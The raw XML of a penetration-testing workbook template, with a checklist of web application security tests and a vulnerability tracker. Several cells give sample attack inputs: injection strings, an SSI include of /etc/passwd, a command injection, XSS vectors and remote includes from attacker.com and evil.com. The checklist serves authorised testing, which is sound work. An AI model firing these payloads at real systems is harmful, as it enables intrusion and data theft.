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defaultThemeVersion="166925"/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="https://tecplix-my.sharepoint.com/personal/anas_an_tecplix_com/Documents/Microsoft Teams Chat Files/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="21" documentId="13_ncr:1_{EF5CE7C2-C3A8-4891-AE31-D3F18CDB9183}" xr6:coauthVersionLast="36" xr6:coauthVersionMax="47" xr10:uidLastSave="{C927C492-FE93-4259-AA30-3E95493AFCFA}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="19200" windowHeight="5940" activeTab="2" xr2:uid="{3F8ABF60-0A23-4EB1-B321-A747948AB96E}"/>
  </bookViews>
  <sheets>
    <sheet name="Testing Prerequisites" sheetId="3" r:id="rId1"/>
    <sheet name="Checklist" sheetId="1" r:id="rId2"/>
    <sheet name="Vulnerability Tracker" sheetId="2" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">Checklist!$A$1:$F$93</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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="255" uniqueCount="246">
  <si>
    <t>Sr. No</t>
  </si>
  <si>
    <t xml:space="preserve">Test Category </t>
  </si>
  <si>
    <t>Test Name</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Result</t>
  </si>
  <si>
    <t>Remark</t>
  </si>
  <si>
    <t>Application Framework Testing</t>
  </si>
  <si>
    <t>Fingerprint Web Server</t>
  </si>
  <si>
    <t>Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits.</t>
  </si>
  <si>
    <t>Review Metafiles for Information Leakage</t>
  </si>
  <si>
    <t>Analyze robots.txt and identify &lt;META&gt; Tags from website.</t>
  </si>
  <si>
    <t>Enumerate Applications and Unwanted Services on Webserver</t>
  </si>
  <si>
    <t>Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers and Ports&amp; services which is open.</t>
  </si>
  <si>
    <t>Review Webpage Comments and Metadata for Information Leakage</t>
  </si>
  <si>
    <t>Find sensitive information from webpage comments and Metadata on source code.</t>
  </si>
  <si>
    <t>Identify application entry points</t>
  </si>
  <si>
    <t>Identify from hidden fields, parameters, methods HTTP header analysis</t>
  </si>
  <si>
    <t>Fingerprint Web Application Framework</t>
  </si>
  <si>
    <t>Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders.</t>
  </si>
  <si>
    <t>Fingerprint 3rd Party libraries on Web Application</t>
  </si>
  <si>
    <t>Identify the 3rd party libraries on web application and version to determine known vulnerabilities and the appropriate exploits.</t>
  </si>
  <si>
    <t>Configuration and Deploy Management Testing</t>
  </si>
  <si>
    <t>Test Application Platform Configuration</t>
  </si>
  <si>
    <t>Identify default installation file/directory, Handle Server errors (40*,50*), Minimal Privilege, Software logging.</t>
  </si>
  <si>
    <t>Test File Extensions and Sensitive Information disclosure</t>
  </si>
  <si>
    <t>Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc)</t>
  </si>
  <si>
    <t>Backup and Unreferenced Files for Sensitive Information</t>
  </si>
  <si>
    <t>Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename</t>
  </si>
  <si>
    <t>Enumerate Directories and Application Admin Interfaces</t>
  </si>
  <si>
    <t>Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)</t>
  </si>
  <si>
    <t>Test HTTP Methods</t>
  </si>
  <si>
    <t>Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XST</t>
  </si>
  <si>
    <t>HTTP Host Header injection</t>
  </si>
  <si>
    <t>Test for the host header manipulation and try to validate the processing of overrride headers(such as X-forwared).</t>
  </si>
  <si>
    <t>Test HTTP Response Headers</t>
  </si>
  <si>
    <t>Inspect the HTTP response and check for the nesessory security headers implemented or not.</t>
  </si>
  <si>
    <t>Identity Management Testing</t>
  </si>
  <si>
    <t>Test Role Definitions</t>
  </si>
  <si>
    <t>Validate the system roles defined within the application by creating permission matrix.</t>
  </si>
  <si>
    <t>Test User Registration Process</t>
  </si>
  <si>
    <t>Verify that the identity requirements for user registration are aligned
with business and security requirements:</t>
  </si>
  <si>
    <t>Test Account Provisioning Process</t>
  </si>
  <si>
    <t>Determine which roles are able to provision users and what sort of
accounts they can provision.</t>
  </si>
  <si>
    <t>Testing for Account Enumeration and Guessable User Account</t>
  </si>
  <si>
    <t>Generic login error statement check, return codes/parameter values, enumerate all possible valid userids (Login system, Forgot password)</t>
  </si>
  <si>
    <t>Testing for Weak or unenforced username policy</t>
  </si>
  <si>
    <t>User account names are often highly structured (e.g. Joe Bloggs
account name is jbloggs and Fred Nurks account name is fnurks)
and valid account names can easily be guessed.</t>
  </si>
  <si>
    <t>Test Permissions of Guest/Training Accounts</t>
  </si>
  <si>
    <t>Guest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorisation process required for access.Evaluate consistency between access policy and guest/training account access permissions.</t>
  </si>
  <si>
    <t>Test Account Suspension/Resumption Process</t>
  </si>
  <si>
    <t>Verify the identity requirements for user registration align with business/security requirements. Validate the registration process.</t>
  </si>
  <si>
    <t>Authentication Testing</t>
  </si>
  <si>
    <t>Testing for Credentials Transported over an Encrypted Channel</t>
  </si>
  <si>
    <t>Check referrer whether its HTTP or HTTPs. Sending data through HTTP and HTTPS.</t>
  </si>
  <si>
    <t>Testing for default credentials</t>
  </si>
  <si>
    <t>Testing for default credentials of common applications, Testing for default password of new accounts.</t>
  </si>
  <si>
    <t>Testing for Weak lock out mechanism</t>
  </si>
  <si>
    <t>Evaluate the account lockout mechanism’s ability to mitigate
brute force password guessing. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.</t>
  </si>
  <si>
    <t>Testing for bypassing authentication schema</t>
  </si>
  <si>
    <t>Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection</t>
  </si>
  <si>
    <t>Test remember password functionality</t>
  </si>
  <si>
    <t>Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?</t>
  </si>
  <si>
    <t>Testing for Browser cache weakness</t>
  </si>
  <si>
    <t>Check browser history issue by clicking "Back" button after logging out. Check browser cache issue from HTTP response headers (Cache-Control: no-cache)</t>
  </si>
  <si>
    <t>Testing for Weak password policy</t>
  </si>
  <si>
    <t>Determine the resistance of the application against brute force
password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of
passwords.</t>
  </si>
  <si>
    <t>Testing for weak password change or reset functionalities</t>
  </si>
  <si>
    <t>Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?), Test password change (Need old password?), CSRF vulnerability ?</t>
  </si>
  <si>
    <t>User name or Email enumeration</t>
  </si>
  <si>
    <t>Test the possibility to enumerate the user name, email and PII informations.</t>
  </si>
  <si>
    <t>2FA bypass</t>
  </si>
  <si>
    <t>Test the possibility to bypass the 2FA mechanisum implemeted on application.</t>
  </si>
  <si>
    <t>Response manipulation</t>
  </si>
  <si>
    <t>Understand the application authentcation workflow and manipulate the server response to bypass the authentication.</t>
  </si>
  <si>
    <t>Testing for Weaker authentication in alternative channel</t>
  </si>
  <si>
    <t>Understand the primary mechanism and Identify other channels (Mobile App, Call center, SSO)</t>
  </si>
  <si>
    <t xml:space="preserve">Authorization Testing </t>
  </si>
  <si>
    <t>Testing Directory traversal/file include/Path Traversal</t>
  </si>
  <si>
    <t>dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Inclusion.</t>
  </si>
  <si>
    <t>Testing for bypassing authorization schema</t>
  </si>
  <si>
    <t>Access a resource without authentication?, Bypass ACL, Force browsing (/admin/adduser.jsp)</t>
  </si>
  <si>
    <t>Testing for Privilege Escalation(Horizonal and Vertical)</t>
  </si>
  <si>
    <t>Testing for role/privilege manipulate the values of hidden variables. Change some param groupid=2 to groupid=1</t>
  </si>
  <si>
    <t>Testing for Insecure Direct Object References</t>
  </si>
  <si>
    <t>Force changing parameter value (?invoice=123 -&gt; ?invoice=456)</t>
  </si>
  <si>
    <t>Session Management Testing</t>
  </si>
  <si>
    <t>Testing for Bypassing Session Management Schema</t>
  </si>
  <si>
    <t>SessionID analysis prediction, unencrypted cookie transport, brute-force.</t>
  </si>
  <si>
    <t>Testing for Cookies attributes</t>
  </si>
  <si>
    <t>Check HTTPOnly and Secure flag, expiration, inspect for sensitive data.</t>
  </si>
  <si>
    <t>Testing for Session Fixation</t>
  </si>
  <si>
    <t>The application doesn't renew the cookie after a successfully user authentication.</t>
  </si>
  <si>
    <t>Testing for Exposed Session Variables</t>
  </si>
  <si>
    <t>Encryption &amp; Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?</t>
  </si>
  <si>
    <t>Testing for Cross Site Request Forgery</t>
  </si>
  <si>
    <t>URL analysis, Direct access to functions without any token.</t>
  </si>
  <si>
    <t>Testing for logout functionality</t>
  </si>
  <si>
    <t>Check reuse session after logout both server-side and SSO.</t>
  </si>
  <si>
    <t>Test for Session token length</t>
  </si>
  <si>
    <t>Check for the session token length issued by the server.</t>
  </si>
  <si>
    <t>Test Session Timeout</t>
  </si>
  <si>
    <t>Check session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.</t>
  </si>
  <si>
    <t>Testing for Session puzzling</t>
  </si>
  <si>
    <t>The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.</t>
  </si>
  <si>
    <t>Data Validation Testing</t>
  </si>
  <si>
    <t>Testing for Reflected Cross Site Scripting</t>
  </si>
  <si>
    <t>Check for input validation, Replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.</t>
  </si>
  <si>
    <t>Testing for Stored Cross Site Scripting</t>
  </si>
  <si>
    <t>Check input forms/Upload forms and analyze HTML codes, Leverage XSS with BeEF</t>
  </si>
  <si>
    <t>Testing for HTTP Verb Tampering</t>
  </si>
  <si>
    <t>Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization.</t>
  </si>
  <si>
    <t>Testing for HTTP Parameter pollution</t>
  </si>
  <si>
    <t>Identify any form or action that allows user-supplied input to bypass Input validation and filters using HPP</t>
  </si>
  <si>
    <t>Testing for SQL Injection</t>
  </si>
  <si>
    <t>Union, Boolean, Error based, Out-of-band, Time delay.</t>
  </si>
  <si>
    <t>Testing for NoSQL injection</t>
  </si>
  <si>
    <t>Identify NoSQL databases, Pass special characters (' " \ ; { } ), Attack with reserved variable name, operator.</t>
  </si>
  <si>
    <t>Testing for LDAP Injection</t>
  </si>
  <si>
    <t>/ldapsearch?user=*
user=*user=*)(uid=*))(|(uid=*
pass=password</t>
  </si>
  <si>
    <t>Testing for ORM Injection</t>
  </si>
  <si>
    <t>Testing ORM injection is identical to SQL injection testing</t>
  </si>
  <si>
    <t>Testing for XML Injection</t>
  </si>
  <si>
    <t>Check with XML Meta Characters
', " , &lt;&gt;, &lt;!--/--&gt;, &amp;, &lt;![CDATA[ / ]]&gt;, XXE, TAG</t>
  </si>
  <si>
    <t>Testing for SSI Injection</t>
  </si>
  <si>
    <t>• Presense of .shtml extension
• Check for these characters
&lt; ! # = / . " - &gt; and [a-zA-Z0-9]
• include String = &lt;!--#include virtual="/etc/passwd" --&gt;</t>
  </si>
  <si>
    <t>Testing for XPath Injection</t>
  </si>
  <si>
    <t>Check for XML error enumeration by supplying a single quote (')
Username: ‘ or ‘1’ = ‘1
Password: ‘ or ‘1’ = ‘1</t>
  </si>
  <si>
    <t>IMAP/SMTP Injection</t>
  </si>
  <si>
    <t>• Identifying vulnerable parameters with special characters(i.e.: \, ‘, “, @, #, !, |)
• Understanding the data flow and deployment structure of the client
• IMAP/SMTP command injection (Header, Body, Footer)</t>
  </si>
  <si>
    <t>Test for forced browsing</t>
  </si>
  <si>
    <t>Check for the forced browsing to retrive the sensitive information from the server.</t>
  </si>
  <si>
    <t>Testing for Code Injection</t>
  </si>
  <si>
    <t>Enter OS commands in the input field.
?arg=1; system('id')</t>
  </si>
  <si>
    <t>Testing for Local File Inclusion</t>
  </si>
  <si>
    <t>LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource)</t>
  </si>
  <si>
    <t>Testing for Remote File Inclusion</t>
  </si>
  <si>
    <t>RFI from malicious URL
?page.php?file=http://attacker.com/malicious_page</t>
  </si>
  <si>
    <t>Testing for Command Injection</t>
  </si>
  <si>
    <t>Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.</t>
  </si>
  <si>
    <t>Testing for Buffer overflow</t>
  </si>
  <si>
    <t>• Testing for heap overflow vulnerability
• Testing for stack overflow vulnerability
• Testing for format string vulnerability</t>
  </si>
  <si>
    <t>Testing for incubated vulnerabilities</t>
  </si>
  <si>
    <t>File Upload, Stored XSS , SQL/XPATH Injection, Misconfigured servers (Tomcat, Plesk, Cpanel)</t>
  </si>
  <si>
    <t>Test For Server Side Template Injection</t>
  </si>
  <si>
    <t>Check the application's template engine, identify injection points, and execute template language commands to manipulate server-side templates.</t>
  </si>
  <si>
    <t>Test for input validations</t>
  </si>
  <si>
    <t>Check the application webform and the processing of the untrusted input supplied by the user.</t>
  </si>
  <si>
    <t>Testing for HTTP Splitting/Smuggling</t>
  </si>
  <si>
    <t>param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a&lt;html&gt;Sorry,%20System%20Down&lt;/html&gt;</t>
  </si>
  <si>
    <t>Error Handling</t>
  </si>
  <si>
    <t>Analysis of Error Codes</t>
  </si>
  <si>
    <t>Locate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)</t>
  </si>
  <si>
    <t>Analysis of Stack Traces</t>
  </si>
  <si>
    <t>• Invalid Input / Empty inputs
• Input that contains non alphanumeric characters or query syntax
• Access to internal pages without authentication
• Bypassing application flow</t>
  </si>
  <si>
    <t>Cryptography</t>
  </si>
  <si>
    <t>Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection</t>
  </si>
  <si>
    <t>Identify SSL service, Idectify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)</t>
  </si>
  <si>
    <t>Testing for Sensitive information sent via unencrypted channels</t>
  </si>
  <si>
    <t>Check sensitive data during the transmission:
• Information used in authentication (e.g. Credentials, PINs, Session
identifiers, Tokens, Cookies…)
• Information protected by laws, regulations or specific organizational
policy (e.g. Credit Cards, Customers data)</t>
  </si>
  <si>
    <t>Business logic Testing</t>
  </si>
  <si>
    <t>Test Business Logic Data Validation</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for data entry points or hand off points between systems or software.
• Once found try to insert logically invalid data into the application/system. </t>
  </si>
  <si>
    <t>Test Ability to Forge Requests</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for guessable, predictable or hidden functionality of fields.
• Once found try to insert logically valid data into the application/system allowing the user go through the application/system against the normal busineess logic workflow. </t>
  </si>
  <si>
    <t>Test Integrity Checks</t>
  </si>
  <si>
    <t xml:space="preserve">Attempt to insert, update or edit delete the data/information values with invalid data/information into each component (i.e. input, database, or log) by users that .should not be allowed per the busines logic workflow. </t>
  </si>
  <si>
    <t>Test Ratelimit functionalities</t>
  </si>
  <si>
    <t>For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.</t>
  </si>
  <si>
    <t>Testing for the Circumvention of Work Flows</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</si>
  <si>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</si>
  <si>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Test Defenses Against Application Mis-use</t>
  </si>
  <si>
    <t>Measures that might indicate the application has in-built self-defense:
• Changed responses
• Blocked requests
• Actions that log a user out or lock their account</t>
  </si>
  <si>
    <t>Test Upload of Unexpected File Types</t>
  </si>
  <si>
    <t>• Try to upload these “unsupported” files an verify that are accepting or not.
• Try to upload the double extension files an verify that are accepting or not.
• Try to upload the files by changing content type and content length headers.
• If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated.PS. file.phtml, shell.phPWND, SHELL~1.PHP</t>
  </si>
  <si>
    <t>Client Side Testing</t>
  </si>
  <si>
    <t>Testing for DOM based Cross Site Scripting</t>
  </si>
  <si>
    <t>Test for the user inputs obtained from client-side JavaScript Objects</t>
  </si>
  <si>
    <t>Testing for JavaScript Execution</t>
  </si>
  <si>
    <t>Inject JavaScript code:
www.victim.com/?javascript:alert(1)</t>
  </si>
  <si>
    <t>Testing for HTML Injection</t>
  </si>
  <si>
    <t>Send malicious HTML code:
?user=&lt;img%20src='aaa'%20onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>Testing for Client Side URL Redirect</t>
  </si>
  <si>
    <t xml:space="preserve">Modify untrusted URL input to a malicious site: (Open Redirect)
?redirect=www.fake-target.site </t>
  </si>
  <si>
    <t>Testing for CSS Injection</t>
  </si>
  <si>
    <t>Inject code in the CSS context :
•  www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])
•  www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)</t>
  </si>
  <si>
    <t>Testing for Client Side Resource Manipulation</t>
  </si>
  <si>
    <t>External JavaScript could be easily injected in the trusted web site
www.victim.com/#http://evil.com/js.js</t>
  </si>
  <si>
    <t>Test Cross Origin Resource Sharing</t>
  </si>
  <si>
    <t>Check the HTTP headers in order to understand how CORS is
used (Origin Header)</t>
  </si>
  <si>
    <t>Testing for Cross Site Flashing</t>
  </si>
  <si>
    <t>Decompile, Undefined variables, Unsafe methods, Include malicious SWF (http://victim/file.swf?lang=http://evil</t>
  </si>
  <si>
    <t>Testing for Clickjacking</t>
  </si>
  <si>
    <t>Discover if a website is vulnerable by loading into an iframe, create simple web page that includes a frame containing the target.</t>
  </si>
  <si>
    <t>Testing WebSockets</t>
  </si>
  <si>
    <t>Identify that the application is using WebSockets by inspecting ws:// or wss:// URI scheme.Use Google Chrome's Developer Tools to view the Network WebSocket communication. Check Origin, Confidentiality and Integrity, Authentication, Authorization, Input Sanitization</t>
  </si>
  <si>
    <t>Server Side Testing</t>
  </si>
  <si>
    <t>Test For SSRF</t>
  </si>
  <si>
    <t>Identify the application internal data fetching/resource fetching call on application and try to extract the internal resources.</t>
  </si>
  <si>
    <t>Race Conditions</t>
  </si>
  <si>
    <t>Check for the race conditions on the application.</t>
  </si>
  <si>
    <t>Test for Application Workflow</t>
  </si>
  <si>
    <t>Test the Application workflow</t>
  </si>
  <si>
    <t>Understand the application workflow and data processing and check for the issues that can create a bussiness loss or bussiness impact.</t>
  </si>
  <si>
    <t>Vulnerability Name</t>
  </si>
  <si>
    <t>Problematic URL</t>
  </si>
  <si>
    <t>Severity</t>
  </si>
  <si>
    <t>CVSS Score</t>
  </si>
  <si>
    <t>CVSS String</t>
  </si>
  <si>
    <t>Vulnerability Description</t>
  </si>
  <si>
    <t>Observation</t>
  </si>
  <si>
    <t>Risk/Impact</t>
  </si>
  <si>
    <t>Recommendation</t>
  </si>
  <si>
    <t>Reference</t>
  </si>
  <si>
    <t>OWASP Mapping</t>
  </si>
  <si>
    <t>Testing browser storage and code source</t>
  </si>
  <si>
    <t>Check local storage and code source for the sensitive data leakage</t>
  </si>
  <si>
    <t>Analysis of Browser console</t>
  </si>
  <si>
    <t>Check the message popping in browser console by the application</t>
  </si>
  <si>
    <t>Project Name</t>
  </si>
  <si>
    <t>About Application/Purpose of application</t>
  </si>
  <si>
    <t>Scope of Assessment (Eg: URL, API Swagger, IP Addresses etc..)</t>
  </si>
  <si>
    <t>Sr.No</t>
  </si>
  <si>
    <t>Scope Asset</t>
  </si>
  <si>
    <t>Brief Description</t>
  </si>
  <si>
    <t>User Roles and Privilages</t>
  </si>
  <si>
    <t>User Role Name</t>
  </si>
  <si>
    <t>Essential Features within Application</t>
  </si>
  <si>
    <t>Feature Name</t>
  </si>
  <si>
    <t>Feature Name/ Workflow</t>
  </si>
  <si>
    <t>Notes captured during the application walkthrough</t>
  </si>
  <si>
    <t>Notes</t>
  </si>
  <si>
    <t>Risk assumption based on application workflow and functionalities (Need to define the test cases on checklist on next subsheet[Checklist] "Test for Application Workflow")</t>
  </si>
  <si>
    <t>Accessibility Check Pass/Fail</t>
  </si>
  <si>
    <t>Questions prepared for walkthrough/ Points that required clarification from Application Team</t>
  </si>
  <si>
    <t>Questions</t>
  </si>
  <si>
    <t>Answers recived from application Team</t>
  </si>
  <si>
    <t>Pentest Planning and Execution</t>
  </si>
  <si>
    <t>Total Days Available for Testing and Reporting</t>
  </si>
  <si>
    <t>Number of days available for testing</t>
  </si>
  <si>
    <t>Dates allocated for the test execution</t>
  </si>
  <si>
    <t>Date of Discussion Scheduled</t>
  </si>
  <si>
    <t>Final Test Wrap-Up Date</t>
  </si>
  <si>
    <t>Report Releasing Date</t>
  </si>
  <si>
    <t>Number of days available for Report generation</t>
  </si>
  <si>
    <t>Test Plan and Date/Days Committed</t>
  </si>
  <si>
    <t>Any Exception or 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</si>
</sst>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rgb="FF0070C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bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="5" tint="0.39997558519241921"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="5" tint="0.59999389629810485"/>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thin">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>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s>
  <cellStyleXfs count="1">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="85">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="1" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment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horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="6" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="2" fillId="6" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="6" borderId="11" xfId="0" applyFont="1" applyFill="1"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xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="14" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="11" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="11" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="15" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="5" borderId="10"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11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="16" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="17" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="12" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="5" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="5" borderId="8" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="10" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="11" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="6" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="6" borderId="12" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="12" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="17" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="12" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="5" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="5" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="5" borderId="16"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12"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11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="14" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="15" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="6" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="7" borderId="10"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13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
